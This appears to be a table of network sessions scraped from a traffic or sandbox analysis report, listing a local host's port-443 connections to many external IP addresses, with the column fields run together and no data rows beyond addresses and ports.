                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20817192.168.2.134875094.102.67.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20818192.168.2.134692436.192.23.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20819192.168.2.1336518221.205.164.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20820192.168.2.1336984209.250.176.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20821192.168.2.1350356120.145.62.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20822192.168.2.134508862.181.93.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20823192.168.2.133535444.58.70.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20824192.168.2.1356898158.50.201.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20825192.168.2.1350634101.214.237.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20826192.168.2.134419074.55.173.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20827192.168.2.135200296.15.108.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20828192.168.2.133753887.113.135.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20829192.168.2.1341348163.98.110.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20830192.168.2.1350232125.193.68.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20831192.168.2.1355990106.9.161.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20832192.168.2.1339132192.243.100.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20833192.168.2.1341104181.192.249.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20834192.168.2.1342400126.186.21.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20835192.168.2.135883439.22.154.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20836192.168.2.1350668103.34.79.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20837192.168.2.134767873.227.201.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20838192.168.2.1354030148.38.105.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20839192.168.2.1345794121.233.146.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20840192.168.2.133641019.163.143.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20841192.168.2.1337544124.145.122.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20842192.168.2.134661883.127.12.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20843192.168.2.1351914150.10.38.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20844192.168.2.1339074139.207.225.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20845192.168.2.1343544213.152.173.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20846192.168.2.1337320168.115.168.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20847192.168.2.1335236164.24.77.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20848192.168.2.1345086183.27.153.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20849192.168.2.1346016137.70.181.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20850192.168.2.1354596143.28.136.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20851192.168.2.1358052148.105.101.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20852192.168.2.1360894191.190.134.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20853192.168.2.134091840.51.92.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20854192.168.2.1336846161.200.95.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20855192.168.2.135537093.16.130.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20856192.168.2.1353826189.220.23.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20857192.168.2.1338210162.199.66.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20858192.168.2.1356916132.98.174.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20859192.168.2.135113648.245.76.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20860192.168.2.133401477.5.200.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20861192.168.2.134025846.66.201.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20862192.168.2.1353748188.148.58.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20863192.168.2.134242820.219.79.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20864192.168.2.1359470222.169.131.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20865192.168.2.1332898184.4.28.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20866192.168.2.1339202181.21.135.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20867192.168.2.134211087.90.24.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20868192.168.2.1338842193.57.41.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20869192.168.2.13365505.209.106.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20870192.168.2.1359786218.203.0.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20871192.168.2.134371869.206.68.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20872192.168.2.1349216146.209.47.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20873192.168.2.133999089.138.159.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20874192.168.2.1333672170.26.62.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20875192.168.2.1340870207.150.36.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20876192.168.2.134857636.158.14.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20877192.168.2.133962280.167.238.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20878192.168.2.13502328.96.171.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20879192.168.2.1350086107.7.31.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20880192.168.2.1349310191.157.6.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20881192.168.2.1349102134.70.240.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20882192.168.2.1341724209.40.133.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20883192.168.2.1355436195.115.205.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20884192.168.2.1339084200.141.57.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20885192.168.2.1352126116.45.4.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20886192.168.2.1359964132.59.117.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20887192.168.2.135175845.203.35.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20888192.168.2.1347862131.80.36.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20889192.168.2.1334506192.64.187.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20890192.168.2.134460223.172.133.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20891192.168.2.1334102218.2.158.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20892192.168.2.1359926209.184.132.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20893192.168.2.1355302150.209.43.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20894192.168.2.1337582213.112.130.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20895192.168.2.1340822117.0.15.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20896192.168.2.1336772181.136.243.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20897192.168.2.1360016160.77.130.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20898192.168.2.1356568169.245.246.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20899192.168.2.1339364107.42.38.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20900192.168.2.1351644178.162.221.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20901192.168.2.136017840.191.126.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20902192.168.2.1355780140.174.145.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20903192.168.2.135475079.163.247.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20904192.168.2.1351878209.145.29.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20905192.168.2.135199892.122.173.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20906192.168.2.1340924142.177.52.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20907192.168.2.13494924.43.161.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20908192.168.2.135490052.216.139.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20909192.168.2.1338662198.219.172.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20910192.168.2.133946884.122.44.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20911192.168.2.133684052.3.143.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20912192.168.2.1358476208.227.116.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20913192.168.2.133325638.53.100.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20914192.168.2.1335296137.26.184.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20915192.168.2.1350698184.146.216.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20916192.168.2.1340678219.219.157.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20917192.168.2.1353038182.169.80.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20918192.168.2.1358792159.237.55.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20919192.168.2.1335184212.24.122.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20920192.168.2.134677657.52.76.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20921192.168.2.1334976148.219.148.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20922192.168.2.1360746207.161.106.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20923192.168.2.134546277.196.111.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20924192.168.2.133513258.225.196.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20925192.168.2.133414239.50.154.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20926192.168.2.1350702164.159.30.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20927192.168.2.1347584213.136.216.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20928192.168.2.1348072199.249.118.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20929192.168.2.1333462217.131.96.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20930192.168.2.133632418.67.195.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20931192.168.2.1341952218.92.135.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20932192.168.2.135342689.84.13.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20933192.168.2.135660081.111.30.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20934192.168.2.1352816156.70.29.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20935192.168.2.1339536169.148.130.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20936192.168.2.1338838148.173.107.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20937192.168.2.1341272151.182.133.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20938192.168.2.1344028124.35.63.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20939192.168.2.1344502110.133.241.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20940192.168.2.134979670.32.172.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20941192.168.2.1343300130.46.1.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20942192.168.2.1357096177.71.255.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20943192.168.2.1337580104.195.201.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20944192.168.2.134310437.153.9.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20945192.168.2.1345538138.1.44.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20946192.168.2.135457480.220.103.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20947192.168.2.1358572103.114.52.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20948192.168.2.134458649.152.179.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20949192.168.2.1333642104.178.14.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20950192.168.2.135429685.62.83.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20951192.168.2.1342040113.139.174.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20952192.168.2.136014834.147.166.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20953192.168.2.13452421.33.159.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20954192.168.2.1357230171.217.39.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20955192.168.2.1341860182.123.174.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20956192.168.2.1336054152.206.58.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20957192.168.2.133999427.178.65.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20958192.168.2.134854646.4.120.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20959192.168.2.13530742.42.109.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20960192.168.2.133718080.185.48.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20961192.168.2.1352008194.47.92.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20962192.168.2.1341076203.84.58.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20963192.168.2.1351514145.146.133.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20964192.168.2.133349449.42.239.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20965192.168.2.133515283.8.177.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20966192.168.2.1360750113.20.176.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20967192.168.2.135455854.231.68.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20968192.168.2.1345380119.171.130.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20969192.168.2.136005872.139.33.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20970192.168.2.1352478106.83.29.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20971192.168.2.1358458182.245.240.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20972192.168.2.13397885.245.62.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20973192.168.2.1360058173.215.119.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20974192.168.2.1346152168.173.128.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20975192.168.2.134875898.211.78.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20976192.168.2.135813279.89.108.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20977192.168.2.133489814.186.14.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20978192.168.2.1344498209.159.142.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20979192.168.2.135139289.37.107.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20980192.168.2.1349898208.193.191.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20981192.168.2.1354830102.216.65.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20982192.168.2.1355186152.107.150.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20983192.168.2.1353326112.94.90.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20984192.168.2.135690442.113.24.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20985192.168.2.1341524150.249.53.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20986192.168.2.1337060169.10.246.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20987192.168.2.1335442167.247.24.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20988192.168.2.1336506140.5.98.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20989192.168.2.136076865.57.70.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20990192.168.2.134665031.31.18.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20991192.168.2.134799477.79.114.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20992192.168.2.1344120113.160.27.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20993192.168.2.1350298197.132.26.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20994192.168.2.1348120173.155.65.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20995192.168.2.133990262.208.78.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20996192.168.2.134226260.207.248.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20997192.168.2.1338698122.166.54.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20998192.168.2.135867480.184.158.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20999192.168.2.1354966100.38.44.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21000192.168.2.134341280.12.39.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21001192.168.2.1346682156.113.94.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21002192.168.2.1335308143.138.189.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21003192.168.2.1348902142.250.73.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21004192.168.2.135925070.7.119.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21005192.168.2.134782264.45.54.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21006192.168.2.1344774130.56.34.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21007192.168.2.133563479.72.179.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21008192.168.2.1356058171.172.242.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21009192.168.2.1335038162.200.137.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21010192.168.2.134995694.187.164.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21011192.168.2.1347384152.248.110.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21012192.168.2.1337832114.97.176.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21013192.168.2.134645075.13.50.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21014192.168.2.1351892112.249.130.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21015192.168.2.1358278151.100.191.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21016192.168.2.1348416163.142.113.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21017192.168.2.1341122151.234.32.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21018192.168.2.1349188119.230.0.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21019192.168.2.1345812184.220.62.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21020192.168.2.133366284.35.120.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21021192.168.2.1344386154.89.158.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21022192.168.2.13537922.91.58.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21023192.168.2.1355134111.170.246.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21024192.168.2.134638673.52.35.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21025192.168.2.134947046.84.128.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21026192.168.2.135715646.14.84.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21027192.168.2.135481665.229.254.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21028192.168.2.13605265.136.76.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21029192.168.2.1351476123.63.57.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21030192.168.2.1345658108.62.24.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21031192.168.2.1347630166.104.131.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21032192.168.2.13560684.9.39.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21033192.168.2.1343042170.188.199.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21034192.168.2.1360450134.39.128.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21035192.168.2.135771431.17.213.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21036192.168.2.1354070209.244.171.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21037192.168.2.135398262.195.19.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
